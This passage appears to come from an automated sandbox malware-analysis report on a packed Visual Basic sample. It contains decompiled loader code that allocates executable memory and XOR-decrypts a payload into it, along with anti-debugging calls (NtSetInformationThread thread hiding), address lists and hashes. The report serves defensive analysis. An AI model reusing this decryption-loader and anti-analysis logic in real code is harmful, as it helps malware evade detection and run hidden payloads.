																																							 *0x69000601 =  *0x69000601 + __al;
																																							__eflags =  *0x69000601;
																																							asm("outsb");
																																							asm("o16 jb 0x64");
																																							if ( *0x69000601 == 0) goto L140;
																																							__eax = __eax + 0x11502f0;
																																							__eflags = __eax;
																																							__dl = __dl +  *0x87028001;
																																							_pop(es);
																																							asm("adc ah, [edx]");
																																							__eflags = __bh;
																																							goto L142;
																																						}
																																					}
																																				}
																																			}
																																		}
																																	} else {
																																		if (__eflags >= 0) goto L112;
																																		goto L110;
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							} else {
																								__ebp =  *__edi * 5;
																								__eflags = __ebp;
																							}
																						} else {
																							if(__eflags >= 0) {
																								L82:
																								 *((intOrPtr*)(__esi + 0x52)) =  *((intOrPtr*)(__esi + 0x52)) + __al;
																								__ebp = __ebp + 1;
																								__esp = __esp + 1;
																								__ebp = __ebp + 1;
																								__esp = __esp + 1;
																								 *0x48000401 =  *0x48000401 + __al;
																								__eflags =  *0x48000401;
																								goto L83;
																							} else {
																								__bh = __bh +  *__edx;
																								__eflags = __bh;
																								_pop(es);
																								goto L71;
																							}
																						}
																					}
																				}
																			}
																		}
																	} else {
																		__ax = __ax ^  *[gs:bx+si];
																		__eax = __eax + 0x47000501;
																		__eflags = __eax;
																		L56:
																		__eax = __eax + 0x61724700;
																		__eflags = __eax;
																	}
																} else {
																	asm("bound esi, [esi]");
																	 *0x62000401 =  *0x62000401 + __al;
																	__eflags =  *0x62000401;
																	goto L48;
																}
															}
														} else {
															if(__eflags != 0) {
																_push(__edx);
																__ebp =  *[gs:bp+0x62] * 0x5007261;
																__eflags = __ebp;
																goto L43;
															} else {
																 *__eax =  *__eax ^ __ax;
																__eax = __eax + 0x3e3049b;
																asm("stc");
																__ebp = __ebp +  *((intOrPtr*)(__edx + 0x51207));
																 *__ebx =  *__ebx + 1;
																__eax = __eax &  *__eax;
																 *__eax =  *__eax + __al;
																_pop(es);
																__eax = __eax + 0x726f4600;
																__ax = __ax ^ 0x00000500;
																 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
																_push(__ebx);
																_push(__ebp);
																_push(__eax);
																__ebp = __ebp + 1;
																 *0x2380479 =  *0x2380479 + __al;
																__al = __al -  *__ecx;
																__eax = 0x61203;
																 *__ebx =  *__ebx + 1;
																 *0x61203 =  *0x61203 - 0x61203;
																 *0x61203 =  *0x61203 + __al;
																__eflags =  *0x61203;
																goto L39;
															}
														}
													} else {
														if (__eflags >= 0) goto L25;
														__eax = __eax + 0x60705cf;
														__eflags = __eax;
														if(__eax >= 0) {
															_t36 = __eax;
															__eax = __ebp;
															__ebp = _t36;
															__dl = __dl +  *__edx;
															__al = __al +  *__eax;
															 *__ebx =  *__ebx + 1;
															__eflags =  *__ebx;
														}
														__eax = __eax -  *__eax;
														 *__eax =  *__eax + __al;
														__al = __al + 8;
														 *(__ebx + 0x6f) =  *(__ebx + 0x6f) + __dl;
														asm("insb");
														__esp =  *(__esi + 0x69) * 0x5006964;
														 *__ecx =  *__ecx + __ecx;
														 *((intOrPtr*)(__ebp + 0x52 + __eax * 2)) =  *((intOrPtr*)(__ebp + 0x52 + __eax * 2)) + __dl;
														_push(__edx);
														__esi = __esi - 1;
														_push(__ebx);
														_push(__eax);
														__edi = __edi - 1;
														_push(__edx);
														 *0x4c10825 =  *0x4c10825 + __al;
														asm("sbb al, 0x7");
														 *__ebx =  *__ebx ^ __al;
														asm("adc al, [ebx]");
														__bh = __bh + __bh;
														__ebp = __ebp +  *__ecx;
														 *__eax =  *__eax + __al;
														 *0x77440009 =  *0x77440009 + __al;
														__eflags =  *0x77440009;
														L28:
														_t46 = __edi + 0x65 + __esi * 2;
														 *_t46 =  *(__edi + 0x65 + __esi * 2) + __al;
														__eflags =  *_t46;
														asm("bound ebp, [gs:ebp+0x65]");
														if( *_t46 < 0) {
															L39:
															 *__eax =  *__eax + __cl;
															 *__eax =  *__eax | __al;
															_push(__ebx);
															__ebp =  *(__esi + 0x64) * 0x34747373;
															__eflags = __ebp;
														} else {
															 *0x54000601 =  *0x54000601 + __al;
															asm("insb");
															goto L30;
														}
													}
												}
											}
										}
									}
								} else {
									asm("bound esi, [ebp+0x38]");
									 *0x14c9 =  *0x14c9 + __dh;
									asm("fcom qword [eax]");
									 *__eax =  *__eax + __al;
									__edx = __edx +  *__eax;
									 *__eax =  *__eax + __al;
									asm("retf 0x10");
									 *((intOrPtr*)(__eax + __eax + 0x46)) =  *((intOrPtr*)(__eax + __eax + 0x46)) + __al;
									__edi = __edi + __edi;
									 *__ecx =  *__ecx + __ebp;
									 *__eax =  *__eax + __al;
									 *__ecx =  *__ecx + __al;
									_push(es);
									 *((intOrPtr*)(__ebx + 0x68)) =  *((intOrPtr*)(__ebx + 0x68)) + __al;
									asm("arpl [gs:ebx+0x31], bp");
									 *0x42000901 =  *0x42000901 + __al;
									__eflags =  *0x42000901;
									asm("outsd");
									_push(0x65616e6f);
									if(__eflags < 0) {
										L16:
										if(__eflags >= 0) {
											_t32 = __eax;
											__eax =  *__esi;
											 *__esi = _t32;
										}
										asm("adc al, [ecx]");
										__bh = __bh + __bh;
										__ebp = __ebp +  *((intOrPtr*)(__eax + __eax));
										__eflags = __ebp;
										goto L19;
									} else {
										 *0x4060679 =  *0x4060679 + __al;
										asm("movsb");
										__eax = __eax + 0x12030e;
										__bh = __bh + __bh;
										__ebp = __ebp +  *((intOrPtr*)(__eax + __eax));
										 *__eax =  *__eax + __al;
										__cl = __cl +  *__ecx;
										_t30 = __ebx + 0x41;
										 *_t30 =  *(__ebx + 0x41) + __dl;
										__eflags =  *_t30;
										__esp = __esp + 1;
										goto L11;
									}
								}
							}
						}
					}
				}
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *__eax =  *__eax + __al;
				 *((intOrPtr*)(__ecx + 0x62)) =  *((intOrPtr*)(__ecx + 0x62)) + __bl;
				_t140 = __ebx - 0x24760077;
				 *_t140 =  *(__ebx - 0x24760077) ^ __ah;
				__eflags =  *_t140;
				do {
					asm("emms");
					__ecx = __ecx - 1;
					asm("fnop");
					asm("lfence");
					__eflags = __ecx - 0x1efffffa;
				} while (__ecx != 0x1efffffa);
				__ebx =  *[fs:0x30];
				__ebx =  *( *[fs:0x30] + 8);
				__edx = 0x8c7;
				__edi = __edi;
				__edx = 0x15ab;
				__edx = 0xcd8;
				asm("fnop");
				__edx = 0x2559;
				__ecx =  *__ebx;
				__edx = 0x1000;
				__eflags = 0x8c7;
				__edx = 0x1000;
				__eax =  *(0x8c7 + __ebx);
				__eax =  *(0x8c7 + __ebx);
				do {
					__eax = __eax - 1;
					__eflags =  *__eax - __ecx;
				} while ( *__eax != __ecx);
				__ebx = 0x2036;
				__edx = 0x1000;
				__ebx = 0x25d1;
				asm("fnop");
				__ebx = 0x25d1 ^ 0x00000007;
				asm("fnop");
				__ebx = 0x18c2;
				asm("fnop");
				__ebx = 0x10cc;
				__eax = __eax + (0x18c2 ^ 0x0000080e);
				asm("fnop");
				__ecx =  *__eax;
				__edx = 0x1000;
				__ebx = 0xcc;
				__edx = 0x1000;
				__ebx = 0xf4;
				0xf4 ^ 0x00000079 = 0xf4 ^ 0x00000079;
				__ebx = 0xa9;
				__ecx =  *__eax;
				asm("fnop");
				__ebx = 0x40;
				asm("fnop");
				asm("fnop");
				0xffffe0a7 = 0xffffffffffffca9f;
				asm("fnop");
				0xffffffffffffca9f + 0x1c2f = 0xffffffffffffe6ce + 0x1cde;
				asm("fnop");
				__ebx = 0x1000;
				__edi = __edi;
				__eax = __eax;
				__edx = 0;
				 *(__ebp + 0x10) = __ecx;
				__eax = VirtualAlloc(0, 0xb000, 0x1000, 0x40);
				__edx = 0x401bb8;
				__eflags = 0x285b60;
				__ecx = 0x64e0;
				do {
					__ebx = 0;
					__ebx = 0x00000000 ^  *(0x285b60 + __ecx);
					__ebx = __ebx ^ 0x2eeac4bd;
					__edi = __edi;
					 *(__eax + __ecx) =  *(__eax + __ecx) | __ebx;
					__ecx = __ecx - 1;
					__ecx = __ecx - 1;
					asm("fnop");
					__ecx = __ecx - 1;
					__ecx = __ecx - 1;
					__eflags = __ecx;
				} while (__ecx >= 0);
				asm("fnop");
				asm("fnop");
				_push(__eax);
				asm("fnop");
				return __eax;
			}

0x004012d4
0x004012d9
0x004012de
0x004012e0
0x004012e2
0x004012e4
0x004012e6
0x004012ea
0x004012ec
0x004012ee
0x004012f0
0x004012f2
0x004012b6
0x004012b6
0x004012f4
0x004012f4
0x004012f4
0x004012f5
0x004012f8
0x004012fb
0x004012fc
0x004012fc
0x004012fc
0x004012fd
0x00401302
0x00401304
0x00401306
0x00401308
0x0040130a
0x0040130b
0x00401311
0x00401312
0x00401313
0x00401314
0x00401315
0x00401318
0x0040131a
0x0040131c
0x0040131e
0x00401320
0x00401325
0x00401325
0x0040132c
0x0040132e
0x0040132e
0x0040132e
0x0040132f
0x00401330
0x00401331
0x00401331
0x00401331
0x00401332
0x00401334
0x00401336
0x0040133c
0x0040133d
0x0040133f
0x00401342
0x00401343
0x00401344
0x0040134c
0x0040134d
0x00401350
0x00401350
0x00401350
0x00401351
0x00401353
0x00401355
0x00401357
0x00401359
0x0040135b
0x0040135d
0x0040135f
0x00401361
0x00401363
0x00401365
0x00401367
0x00401367
0x00401367
0x00401368
0x0040136a
0x0040136c
0x0040136e
0x00401370
0x00401372
0x00401374
0x0040137b
0x0040137d
0x00401383
0x00401384
0x00401385
0x00401385
0x0040138b
0x004013fc
0x004013fc
0x00401401
0x00000000
0x0040138d
0x0040138d
0x004013f5
0x004013f5
0x004013f6
0x004013f7
0x004013f8
0x004013f9
0x004013fa
0x004013fb
0x004013fb
0x00000000
0x0040138f
0x0040138f
0x00401403
0x00401403
0x00000000
0x00401405
0x00401405
0x00401406
0x00000000
0x00401406
0x00401391
0x00401391
0x00401394
0x00401396
0x00401398
0x00401399
0x0040139b
0x0040139e
0x0040139e
0x0040139e
0x004013a1
0x004013a2
0x0040140a
0x0040140a
0x0040140a
0x00000000
0x004013a4
0x004013a4
0x00401418
0x00401418
0x0040141a
0x0040141c
0x0040141e
0x0040141e
0x0040141e
0x00401421
0x00401488
0x00401488
0x00401488
0x00000000
0x00401423
0x00401423
0x00401491
0x00401491
0x00401491
0x00401491
0x00000000
0x00401425
0x00401425
0x0040148a
0x0040148a
0x0040148a
0x00000000
0x00401427
0x00401427
0x00401427
0x0040142e
0x0040142f
0x00401492
0x00401492
0x00401494
0x00401494
0x00401494
0x00401494
0x00401495
0x00401497
0x00401499
0x0040149b
0x0040149d
0x0040149f
0x004014a0
0x004014a0
0x00000000
0x00401431
0x00401431
0x004014a2
0x004014a2
0x004014a9
0x004014ac
0x004014ac
0x004014b1
0x004014b2
0x00401521
0x00401521
0x00401524
0x00401524
0x0040152a
0x0040152b
0x0040159f
0x0040159f
0x0040159f
0x004015a1
0x004015a4
0x00000000
0x004015a5
0x004015a5
0x004015a5
0x004015a6
0x004015a6
0x004015ab
0x004015ad
0x004015af
0x004015af
0x004015b1
0x004015b3
0x004015b5
0x004015b7
0x004015bd
0x004015be
0x004015bf
0x004015c1
0x004015c2
0x004015c3
0x004015c9
0x004015ca
0x004015cb
0x004015cc
0x004015d2
0x004015d9
0x004015db
0x004015dd
0x004015e0
0x004015e1
0x004015e1
0x004015e1
0x004015e4
0x00401650
0x00401655
0x00401657
0x00401659
0x0040165b
0x0040165d
0x0040165f
0x00401660
0x00401661
0x00401662
0x00401663
0x00401664
0x00401665
0x00401666
0x00401667
0x00401668
0x00401668
0x0040166e
0x0040166f
0x00401671
0x00401673
0x00401678
0x00000000
0x004015e7
0x004015e7
0x004015ea
0x004015ef
0x004015f0
0x004015f1
0x004015f8
0x004015fd
0x004015fe
0x00401600
0x00401601
0x00401607
0x00401609
0x0040160b
0x0040160c
0x0040160c
0x0040160c
0x00000000
0x0040160c
0x004015e4
0x0040152d
0x0040152d
0x0040152e
0x00401531
0x00401536
0x00401537
0x0040153a
0x0040153c
0x0040153e
0x00401540
0x00401542
0x00401544
0x00401546
0x00401549
0x0040154e
0x00401551
0x00401552
0x00401553
0x00401559
0x00401563
0x00401565
0x00401567
0x00401569
0x00401569
0x0040156b
0x0040156c
0x0040156e
0x0040156f
0x00401570
0x00401571
0x00401572
0x00401578
0x0040157a
0x00401581
0x00401583
0x00401585
0x00401589
0x0040158b
0x0040158d
0x00401593
0x00401594
0x00401594
0x00401594
0x00401597
0x00401598
0x0040160d
0x0040160d
0x0040160e
0x00401679
0x00401679
0x00401679
0x00401679
0x0040167d
0x0040167f
0x00401681
0x00401686
0x00401687
0x00401687
0x00401687
0x0040168a
0x004016ed
0x004016ed
0x004016ef
0x004016ef
0x004016ef
0x004016f0
0x004016f2
0x004016f4
0x004016f6
0x004016f8
0x004016fa
0x00000000
0x0040168c
0x0040168c
0x00401694
0x00401695
0x00401696
0x004016fd
0x004016fd
0x004016fd
0x004016fe
0x00000000
0x00401700
0x00401700
0x00401701
0x00000000
0x00401703
0x00401703
0x00401704
0x00401705
0x00401706
0x00401706
0x0040170c
0x0040170d
0x0040177f
0x00000000
0x00401781
0x00401781
0x00000000
0x00401783
0x00401783
0x00401789
0x0040178a
0x00401790
0x00401792
0x00401793
0x00401795
0x00401797
0x00401799
0x0040179a
0x0040179b
0x0040179c
0x0040179d
0x0040179e
0x0040179f
0x004017a0
0x004017a1
0x004017a7
0x004017aa
0x004017ac
0x004017ac
0x004017b1
0x004017b3
0x004017b3
0x004017b8
0x004017ba
0x004017bc
0x004017be
0x004017c0
0x004017c0
0x004017c0
0x004017c3
0x00000000
0x004017c6
0x004017c6
0x004017ce
0x004017cf
0x004017d7
0x004017d8
0x004017de
0x004017e0
0x004017e2
0x004017e2
0x004017e3
0x004017e5
0x004017e7
0x004017e9
0x004017e9
0x00000000
0x004017e9
0x004017c3
0x00401781
0x0040170f
0x0040170f
0x00401712
0x00401712
0x00000000
0x00401712
0x0040170d
0x00401701
0x00401698
0x00401698
0x0040169e
0x0040169f
0x004016a1
0x004016a3
0x004016a5
0x004016a7
0x004016aa
0x004016ac
0x004016ae
0x004016ae
0x004016af
0x00401725
0x00401725
0x00401726
0x00401729
0x0040172a
0x0040172c
0x0040172f
0x0040172f
0x00401734
0x00401737
0x00401739
0x00401739
0x0040173e
0x00401740
0x00401742
0x00401742
0x00401746
0x00401749
0x00401749
0x0040174b
0x0040174c
0x00000000
0x004016b1
0x004016b1
0x00401714
0x00401714
0x00401715
0x00401717
0x00401719
0x00401719
0x00401719
0x0040171a
0x0040171c
0x0040171e
0x00401720
0x00401723
0x00401723
0x00000000
0x004016b3
0x004016b3
0x004016b8
0x004016bb
0x004016bc
0x004016bd
0x004016c0
0x004016c5
0x004016c7
0x004016c8
0x004016cd
0x004016cf
0x004016d1
0x004016d8
0x004016d8
0x004016e0
0x00401755
0x00401755
0x0040175a
0x0040175b
0x0040175c
0x0040175d
0x0040175d
0x00401763
0x00401768
0x00401769
0x0040176b
0x00401771
0x00401772
0x00401772
0x00401772
0x00401775
0x00401775
0x00401776
0x00401776
0x004017eb
0x004017eb
0x004017eb
0x004017ec
0x00401853
0x00401853
0x00000000
0x004017ee
0x004017ee
0x00401854
0x00401854
0x00401854
0x00401855
0x0040185a
0x0040185c
0x0040185e
0x00401861
0x00401863
0x00401866
0x00401868
0x00401869
0x00401869
0x00401869
0x00000000
0x004017f0
0x004017f0
0x004017f4
0x004017f4
0x004017f8
0x004017f8
0x004017f8
0x004017f8
0x004017fb
0x004017fb
0x004017fc
0x0040186c
0x0040186c
0x0040186d
0x00000000
0x0040186f
0x0040186f
0x00401872
0x00401872
0x00401877
0x00000000
0x00401879
0x00401879
0x0040187a
0x0040187c
0x00401881
0x00401884
0x00401886
0x00000000
0x00401886
0x00401877
0x004017ff
0x004017ff
0x00401806
0x00401808
0x00401809
0x0040180e
0x00401810
0x00401812
0x00401815
0x00401819
0x0040181a
0x0040181b
0x0040181c
0x0040181c
0x00401822
0x00401897
0x00401897
0x00000000
0x00401899
0x00401899
0x0040189f
0x004018a0
0x004018a1
0x004018a2
0x004018a2
0x00000000
0x004018a2
0x00401824
0x00401824
0x0040188b
0x0040188b
0x0040188d
0x0040188f
0x0040188f
0x00000000
0x00401826
0x00401826
0x00401891
0x00401891
0x00401891
0x00401892
0x00000000
0x00401894
0x00401894
0x00401894
0x00000000
0x00401894
0x00401828
0x00401828
0x0040182e
0x0040182f
0x00401831
0x00401831
0x00401832
0x00401832
0x00401834
0x00401836
0x00401838
0x0040183a
0x0040183a
0x00401840
0x004018ad
0x004018ad
0x004018ae
0x004018b0
0x004018b2
0x004018b4
0x004018b6
0x004018b6
0x004018b8
0x004018bc
0x00000000
0x004018be
0x004018be
0x004018bf
0x004018c1
0x004018c1
0x00000000
0x004018c1
0x00401842
0x00401842
0x004018a5
0x004018a5
0x004018a7
0x004018a9
0x004018a9
0x004018a9
0x00000000
0x00401844
0x00401844
0x00401846
0x00401846
0x0040184c
0x0040184d
0x004018c4
0x004018c4
0x004018c4
0x00000000
0x0040184f
0x0040184f
0x004018c6
0x004018c6
0x004018c6
0x004018c7
0x004018ca
0x004018cc
0x004018cc
0x004018cc
0x004018d1
0x004018d3
0x004018d4
0x004018d6
0x004018d7
0x004018d9
0x004018d9
0x004018d9
0x004018db
0x004018db
0x004018dc
0x004018dc
0x004018dc
0x004018de
0x004018de
0x004018e0
0x004018e0
0x004018e0
0x004018e3
0x00401956
0x00401956
0x00401958
0x0040195a
0x0040195a
0x00000000
0x004018e4
0x004018e4
0x004018e5
0x00401955
0x00401955
0x00401955
0x00000000
0x004018e7
0x004018e7
0x004018eb
0x004018eb
0x004018f0
0x0040195e
0x0040195e
0x00401960
0x00401965
0x00401965
0x00401967
0x00401969
0x00401969
0x00401969
0x0040196d
0x0040196d
0x0040196f
0x00401971
0x00401974
0x00401975
0x0040197a
0x0040197c
0x0040197f
0x00401981
0x00401983
0x00401983
0x00401983
0x00000000
0x00401983
0x004018f2
0x004018f2
0x004018f4
0x004018f5
0x004018f9
0x004018fe
0x00401900
0x00401902
0x00401904
0x00401906
0x00401906
0x00401907
0x00401907
0x00401908
0x0040190a
0x0040190c
0x0040190e
0x0040190f
0x00401910
0x00401911
0x00401912
0x00401913
0x00401914
0x00401915
0x00401916
0x00401917
0x00401917
0x0040191d
0x0040191e
0x00401985
0x00401985
0x00401987
0x00401989
0x0040198b
0x0040198d
0x0040198f
0x00401991
0x00401993
0x00401993
0x00401995
0x00401997
0x00401999
0x0040199b
0x0040199d
0x0040199f
0x004019a1
0x004019a3
0x004019a5
0x004019a5
0x00000000
0x00401920
0x00401920
0x00401926
0x00401927
0x0040192c
0x0040192c
0x0040192d
0x0040192d
0x0040192f
0x00401932
0x00401934
0x00401935
0x00401935
0x00401935
0x00401938
0x00401939
0x004019a6
0x004019a6
0x004019a8
0x004019aa
0x004019ac
0x004019ae
0x004019b0
0x004019b2
0x004019b4
0x004019b6
0x004019b8
0x004019ba
0x004019bc
0x004019be
0x004019c0
0x004019c2
0x004019c4
0x004019c6
0x004019c8
0x004019c8
0x0040193b
0x0040193b
0x0040193c
0x0040193c
0x00401942
0x00401943
0x00401946
0x00401948
0x00401948
0x0040194a
0x00401950
0x00401951
0x00401953
0x00000000
0x00401953
0x00401939
0x0040191e
0x004018f0
0x004018e5
0x00401852
0x00401852
0x00000000
0x00401852
0x0040184f
0x0040184d
0x00401842
0x00401840
0x00401826
0x00401824
0x00401822
0x004017fc
0x004017ee
0x00401777
0x00401777
0x00401777
0x00401777
0x004016e2
0x004016e2
0x0040174d
0x0040174d
0x00401750
0x00401751
0x00401752
0x00401753
0x00401754
0x00401754
0x00000000
0x004016e4
0x004016ea
0x004016ea
0x004016ec
0x00000000
0x004016ec
0x004016e2
0x004016e0
0x004016b1
0x004016af
0x00401696
0x00401610
0x00401610
0x00401615
0x00401615
0x00401617
0x00401617
0x00401617
0x00401617
0x0040159a
0x0040159a
0x0040159c
0x0040159c
0x00000000
0x0040159c
0x00401598
0x004014b4
0x004014b4
0x0040151c
0x0040151d
0x0040151d
0x00000000
0x004014b6
0x004014b6
0x004014b9
0x004014be
0x004014bf
0x004014c5
0x004014c7
0x004014c9
0x004014cb
0x004014cc
0x004014d1
0x004014d5
0x004014d8
0x004014d9
0x004014da
0x004014db
0x004014dc
0x004014e2
0x004014e4
0x004014e9
0x004014eb
0x004014ed
0x004014ed
0x00000000
0x004014ed
0x004014b4
0x00401434
0x00401434
0x00401437
0x00401437
0x0040143c
0x0040143e
0x0040143e
0x0040143e
0x0040143f
0x00401441
0x00401443
0x00401443
0x00401443
0x00401445
0x00401447
0x00401449
0x0040144b
0x0040144e
0x0040144f
0x00401456
0x00401458
0x0040145c
0x0040145d
0x0040145e
0x0040145f
0x00401460
0x00401461
0x00401462
0x00401468
0x0040146a
0x0040146c
0x0040146e
0x00401470
0x00401472
0x00401474
0x00401474
0x00401477
0x00401477
0x00401477
0x00401477
0x0040147b
0x0040147f
0x004014ee
0x004014ee
0x004014f0
0x004014f2
0x004014f3
0x004014f3
0x00401481
0x00401481
0x00401487
0x00000000
0x00401487
0x0040147f
0x00401431
0x0040142f
0x00401425
0x00401423
0x004013a6
0x004013a6
0x004013a9
0x004013af
0x004013b1
0x004013b3
0x004013b5
0x004013b7
0x004013ba
0x004013be
0x004013c0
0x004013c2
0x004013c4
0x004013c6
0x004013c7
0x004013ca
0x004013ce
0x004013ce
0x004013d4
0x004013d5
0x004013da
0x0040140f
0x0040140f
0x00401411
0x00401411
0x00401411
0x00401411
0x00401413
0x00401415
0x00401417
0x00401417
0x00000000
0x004013dc
0x004013dc
0x004013e2
0x004013e3
0x004013e8
0x004013ea
0x004013ed
0x004013ef
0x004013f1
0x004013f1
0x004013f1
0x004013f4
0x00000000
0x004013f4
0x004013da
0x004013a4
0x004013a2
0x0040138f
0x0040138d
0x004019c9
0x004019cb
0x004019cd
0x004019cf
0x004019d1
0x004019d3
0x004019d5
0x004019d7
0x004019d9
0x004019db
0x004019dd
0x004019df
0x004019e1
0x004019e3
0x004019e5
0x004019e7
0x004019e9
0x004019eb
0x004019ed
0x004019ef
0x004019f1
0x004019f3
0x004019f5
0x004019f7
0x004019f9
0x004019fb
0x004019fd
0x004019ff
0x00401a01
0x00401a03
0x00401a05
0x00401a07
0x00401a09
0x00401a0b
0x00401a0d
0x00401a0f
0x00401a11
0x00401a13
0x00401a15
0x00401a17
0x00401a19
0x00401a1c
0x00401a1c
0x00401a1c
0x00401a22
0x00401a22
0x00401a28
0x00401a2b
0x00401a2d
0x00401a33
0x00401a33
0x00401a3f
0x00401a4a
0x00401a55
0x00401a5a
0x00401a5e
0x00401a67
0x00401a6d
0x00401a71
0x00401a77
0x00401a7b
0x00401a7b
0x00401a85
0x00401a89
0x00401a8c
0x00401a90
0x00401a94
0x00401a98
0x00401a98
0x00401aa0
0x00401aa7
0x00401aa9
0x00401ab1
0x00401ab3
0x00401ab7
0x00401ab9
0x00401abf
0x00401ac3
0x00401ad0
0x00401ad2
0x00401ad6
0x00401ad8
0x00401adc
0x00401ae1
0x00401ae5
0x00401aee
0x00401af2
0x00401af5
0x00401af7
0x00401af9
0x00401b05
0x00401b07
0x00401b12
0x00401b18
0x00401b26
0x00401b2c
0x00401b2f
0x00401b38
0x00401b44
0x00401b48
0x00401b53
0x00401b5a
0x00401b69
0x00401b69
0x00401b73
0x00401b7b
0x00401b7b
0x00401b84
0x00401b8b
0x00401b91
0x00401b95
0x00401b9c
0x00401ba1
0x00401ba2
0x00401ba6
0x00401bab
0x00401bab
0x00401bab
0x00401bae
0x00401bb0
0x00401bb2
0x00401bb5
0x00401bb7

APIs

#100.MSVBVM60(VB5!6&*), ref: 004012D9

Strings

`[(, xrefs: 00401B61
VB5!6&*, xrefs: 004012D4, 00401384

Memory Dump Source

Source File: 00000000.00000002.313159518.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313147738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.313168282.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313176229.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.313181359.0000000000411000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: #100
String ID: VB5!6&*$`[(
API String ID: 1341478452-2868054153
Opcode ID: e89d2c8c1db22d924d50fe184289d099ca3d808489d430116962cae9e44cebcf
Instruction ID: 63ff07005167e3044fb5330c92d0c94b0ad1942a1b1bc7259736e4494d201c9b
Opcode Fuzzy Hash: e89d2c8c1db22d924d50fe184289d099ca3d808489d430116962cae9e44cebcf
Instruction Fuzzy Hash: 4B62CE7254E3C04FD7078B789CA52623FB1EF5331471D81EBC4819B2B3E229991AC76A

Uniqueness

Uniqueness Score: -1.00%

Function 021F0D39, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 369COMMON

Download Yara Rule

Strings

1.!T, xrefs: 021F0490

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: 148d2e47909c6d393941c576a8d29e41e2be62101f562899e68084fbc3e47af9
Instruction ID: 9f06540fb9972ebdba8cf185b892a02ad8f26589a8f06a16f21991377c3c318b
Opcode Fuzzy Hash: 148d2e47909c6d393941c576a8d29e41e2be62101f562899e68084fbc3e47af9
Instruction Fuzzy Hash: C1C153B1280306BFFFA45E14CD55BEA3AA2EF45350F514224FFB9AB1D0D3B99885CA41

Uniqueness

Uniqueness Score: -1.00%

Function 021F0399, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(021F03E0,?,00000000,?,021F3F3F,?), ref: 021F03B4
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE

Strings

1.!T, xrefs: 021F0490

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: 826f73dd83234ad3f02e421951b85bb306f9f5b7da61cada97bb41ac47638d3f
Instruction ID: 2a5a402eb75484887e235b10f908e05898c14b284ca3a7d036dafdf2a0bb8afd
Opcode Fuzzy Hash: 826f73dd83234ad3f02e421951b85bb306f9f5b7da61cada97bb41ac47638d3f
Instruction Fuzzy Hash: 37317A70688305AFEB949F248C51BEB3792AF49360F104226FFB69B2D6D770C801C651

Uniqueness

Uniqueness Score: -1.00%

Function 021F536B, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 354COMMON

Download Yara Rule

Strings

1.!T, xrefs: 021F0490

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: 1.!T
API String ID: 3389902171-3147410236
Opcode ID: aef874c9f4c65d601178a0feee777ec799052b1f2a07cc33b5abbfc60bcdcf54
Instruction ID: 5dab0fec1357537a105ff4c7e13eac0ff3333e59766c0982fa673768cb740bc2
Opcode Fuzzy Hash: aef874c9f4c65d601178a0feee777ec799052b1f2a07cc33b5abbfc60bcdcf54
Instruction Fuzzy Hash: 2EC13B60A88341EFDB68DF28849476A7793AF06364FD58269DFB64F2D6D3308442CB12

Uniqueness

Uniqueness Score: -1.00%

Function 021F48EE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

1.!T, xrefs: 021F0490

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID: 1.!T
API String ID: 0-3147410236
Opcode ID: 071654a95c942398db0d8e2cdd3e28c635af102c45efca7cb524d97bbab9efcf
Instruction ID: 5005413ea33963df189bc8627f40a40e1cbfa89bb99c9d3554f6c44ce6bf1ef3
Opcode Fuzzy Hash: 071654a95c942398db0d8e2cdd3e28c635af102c45efca7cb524d97bbab9efcf
Instruction Fuzzy Hash: 44417D70388346AFDB988E248D617A73B917F4A764F19435AEFB65B2C6D370C801C751

Uniqueness

Uniqueness Score: -1.00%

